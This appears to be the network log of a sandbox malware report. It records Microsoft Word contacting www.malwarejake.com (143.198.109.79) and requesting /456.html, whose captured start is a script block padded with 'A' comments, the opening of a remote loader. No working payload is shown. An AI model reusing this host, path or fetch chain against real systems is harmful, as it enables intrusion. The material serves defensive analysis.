                                                                                                                                                                                                      Aug 18, 2022 08:34:56.482027054 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.482069969 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.482151031 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.482361078 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.482376099 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.842569113 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.873544931 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.873575926 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.875775099 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:56.875796080 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198750973 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198812008 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198883057 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198921919 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198940039 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198951960 CEST49748443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.198959112 CEST44349748143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.207793951 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.207868099 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.207993031 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.208487988 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.208515882 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.585951090 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:57.586105108 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.062576056 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.062618971 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.067028046 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.067059040 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.254457951 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.254626989 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.255451918 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.255502939 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.255547047 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.255574942 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.256588936 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.256633997 CEST44349749143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.256654978 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.256697893 CEST49749443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.405798912 CEST49750443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.405831099 CEST44349750143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.405945063 CEST49750443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.406238079 CEST49750443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.406251907 CEST44349750143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.766601086 CEST44349750143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.766721964 CEST49750443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.767169952 CEST49750443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.767185926 CEST44349750143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.771007061 CEST49750443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:58.771027088 CEST44349750143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.122493982 CEST44349750143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.122581959 CEST44349750143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.122745037 CEST49750443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.122919083 CEST49750443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.122936010 CEST44349750143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.122951031 CEST49750443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.122992039 CEST49750443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.311961889 CEST49751443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.311996937 CEST44349751143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.312134027 CEST49751443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.312465906 CEST49751443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.312479973 CEST44349751143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.667509079 CEST44349751143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.667678118 CEST49751443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.668205023 CEST49751443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.668226957 CEST44349751143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.672009945 CEST49751443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:34:59.672030926 CEST44349751143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:35:00.015960932 CEST44349751143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:35:00.016048908 CEST44349751143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:35:00.016083956 CEST49751443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:00.016109943 CEST49751443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:00.016164064 CEST49751443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:00.016176939 CEST44349751143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:35:00.016194105 CEST49751443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:00.016231060 CEST49751443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:04.578597069 CEST49756443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:04.578665018 CEST44349756143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:35:04.578810930 CEST49756443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:04.579230070 CEST49756443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:04.579242945 CEST44349756143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:35:04.949101925 CEST44349756143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:35:04.949218988 CEST49756443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:04.949805021 CEST49756443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:04.949815035 CEST44349756143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:35:04.956412077 CEST49756443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:04.956429005 CEST44349756143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:35:05.315623999 CEST44349756143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:35:05.315704107 CEST44349756143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:35:05.315745115 CEST49756443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:05.315763950 CEST49756443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:05.315888882 CEST49756443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:05.315908909 CEST44349756143.198.109.79192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:35:05.315932989 CEST49756443192.168.2.4143.198.109.79
                                                                                                                                                                                                      Aug 18, 2022 08:35:05.315953016 CEST49756443192.168.2.4143.198.109.79

                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      Aug 18, 2022 08:34:46.991873026 CEST5856553192.168.2.48.8.8.8
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.011255026 CEST53585658.8.8.8192.168.2.4
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.362970114 CEST5680753192.168.2.48.8.8.8
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.381969929 CEST53568078.8.8.8192.168.2.4

                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                      Aug 18, 2022 08:34:46.991873026 CEST192.168.2.48.8.8.80x5398Standard query (0)www.malwarejake.comA (IP address)IN (0x0001)
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.362970114 CEST192.168.2.48.8.8.80xc8e2Standard query (0)www.malwarejake.comA (IP address)IN (0x0001)

                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                      Aug 18, 2022 08:34:47.011255026 CEST8.8.8.8192.168.2.40x5398No error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)
                                                                                                                                                                                                      Aug 18, 2022 08:34:52.381969929 CEST8.8.8.8192.168.2.40xc8e2No error (0)www.malwarejake.com143.198.109.79A (IP address)IN (0x0001)

                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                      • www.malwarejake.com

                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      0192.168.2.449741143.198.109.79443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      2022-08-18 06:34:47 UTC0OUTOPTIONS / HTTP/1.1
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                      Host: www.malwarejake.com
                                                                                                                                                                                                      2022-08-18 06:34:47 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                      Date: Thu, 18 Aug 2022 06:34:47 GMT
                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                      Allow: GET,POST,OPTIONS,HEAD
                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Content-Type: text/html


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      1192.168.2.449742143.198.109.79443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      2022-08-18 06:34:48 UTC0OUTHEAD /456.html HTTP/1.1
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                      Host: www.malwarejake.com
                                                                                                                                                                                                      2022-08-18 06:34:48 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                      Date: Thu, 18 Aug 2022 06:34:48 GMT
                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
                                                                                                                                                                                                      ETag: "1b90-5e045198f8aaa"
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      Content-Length: 7056
                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Content-Type: text/html


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      10192.168.2.449751143.198.109.79443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      2022-08-18 06:34:59 UTC11OUTHEAD /456.html HTTP/1.1
                                                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                      Host: www.malwarejake.com
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2022-08-18 06:35:00 UTC11INHTTP/1.1 200 OK
                                                                                                                                                                                                      Date: Thu, 18 Aug 2022 06:34:59 GMT
                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
                                                                                                                                                                                                      ETag: "1b90-5e045198f8aaa"
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      Content-Length: 7056
                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Content-Type: text/html


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      11192.168.2.449756143.198.109.79443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      2022-08-18 06:35:04 UTC12OUTHEAD /456.html HTTP/1.1
                                                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                      Host: www.malwarejake.com
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2022-08-18 06:35:05 UTC12INHTTP/1.1 200 OK
                                                                                                                                                                                                      Date: Thu, 18 Aug 2022 06:35:05 GMT
                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
                                                                                                                                                                                                      ETag: "1b90-5e045198f8aaa"
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      Content-Length: 7056
                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Content-Type: text/html


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      2192.168.2.449743143.198.109.79443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      2022-08-18 06:34:51 UTC0OUTOPTIONS / HTTP/1.1
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                      Host: www.malwarejake.com
                                                                                                                                                                                                      2022-08-18 06:34:52 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                                                      Date: Thu, 18 Aug 2022 06:34:52 GMT
                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                      Allow: GET,POST,OPTIONS,HEAD
                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Content-Type: text/html


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      3192.168.2.449744143.198.109.79443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      2022-08-18 06:34:52 UTC1OUTGET /456.html HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      Host: www.malwarejake.com
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2022-08-18 06:34:53 UTC1INHTTP/1.1 200 OK
                                                                                                                                                                                                      Date: Thu, 18 Aug 2022 06:34:53 GMT
                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
                                                                                                                                                                                                      ETag: "1b90-5e045198f8aaa"
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      Content-Length: 7056
                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                      2022-08-18 06:34:53 UTC1INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                      Data Ascii: <!doctype html><html lang="en"><body><script>//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      4192.168.2.449745143.198.109.79443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      2022-08-18 06:34:53 UTC8OUTHEAD /456.html HTTP/1.1
                                                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                      Host: www.malwarejake.com
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2022-08-18 06:34:54 UTC9INHTTP/1.1 200 OK
                                                                                                                                                                                                      Date: Thu, 18 Aug 2022 06:34:53 GMT
                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
                                                                                                                                                                                                      ETag: "1b90-5e045198f8aaa"
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      Content-Length: 7056
                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Content-Type: text/html


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      5192.168.2.449746143.198.109.79443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      2022-08-18 06:34:54 UTC9OUTHEAD /456.html HTTP/1.1
                                                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                      Host: www.malwarejake.com
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2022-08-18 06:34:54 UTC9INHTTP/1.1 200 OK
                                                                                                                                                                                                      Date: Thu, 18 Aug 2022 06:34:54 GMT
                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
                                                                                                                                                                                                      ETag: "1b90-5e045198f8aaa"
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      Content-Length: 7056
                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Content-Type: text/html


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      6192.168.2.449747143.198.109.79443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      2022-08-18 06:34:55 UTC9OUTOPTIONS / HTTP/1.1
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                                                      X-MSGETWEBURL: t
                                                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                      Host: www.malwarejake.com
                                                                                                                                                                                                      2022-08-18 06:34:55 UTC9INHTTP/1.1 200 OK
                                                                                                                                                                                                      Date: Thu, 18 Aug 2022 06:34:55 GMT
                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                      Allow: GET,POST,OPTIONS,HEAD
                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Content-Type: text/html


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      7192.168.2.449748143.198.109.79443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      2022-08-18 06:34:56 UTC10OUTHEAD /456.html HTTP/1.1
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                                                      User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                                      X-Office-Major-Version: 16
                                                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                                                      X-FeatureVersion: 1
                                                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                      Host: www.malwarejake.com
                                                                                                                                                                                                      2022-08-18 06:34:57 UTC10INHTTP/1.1 200 OK
                                                                                                                                                                                                      Date: Thu, 18 Aug 2022 06:34:57 GMT
                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
                                                                                                                                                                                                      ETag: "1b90-5e045198f8aaa"
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      Content-Length: 7056
                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Content-Type: text/html


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      8192.168.2.449749143.198.109.79443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      2022-08-18 06:34:58 UTC10OUTGET /456.html HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      Host: www.malwarejake.com
                                                                                                                                                                                                      If-Modified-Since: Tue, 31 May 2022 01:57:49 GMT
                                                                                                                                                                                                      If-None-Match: "1b90-5e045198f8aaa"
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2022-08-18 06:34:58 UTC11INHTTP/1.1 304 Not Modified
                                                                                                                                                                                                      Date: Thu, 18 Aug 2022 06:34:58 GMT
                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      ETag: "1b90-5e045198f8aaa"


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      9192.168.2.449750143.198.109.79443C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      2022-08-18 06:34:58 UTC11OUTHEAD /456.html HTTP/1.1
                                                                                                                                                                                                      Authorization: Bearer
                                                                                                                                                                                                      X-MS-CookieUri-Requested: t
                                                                                                                                                                                                      X-IDCRL_ACCEPTED: t
                                                                                                                                                                                                      User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                                      Host: www.malwarejake.com
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2022-08-18 06:34:59 UTC11INHTTP/1.1 200 OK
                                                                                                                                                                                                      Date: Thu, 18 Aug 2022 06:34:59 GMT
                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                      Last-Modified: Tue, 31 May 2022 01:57:49 GMT
                                                                                                                                                                                                      ETag: "1b90-5e045198f8aaa"
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      Content-Length: 7056
                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Content-Type: text/html


                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                      Behavior

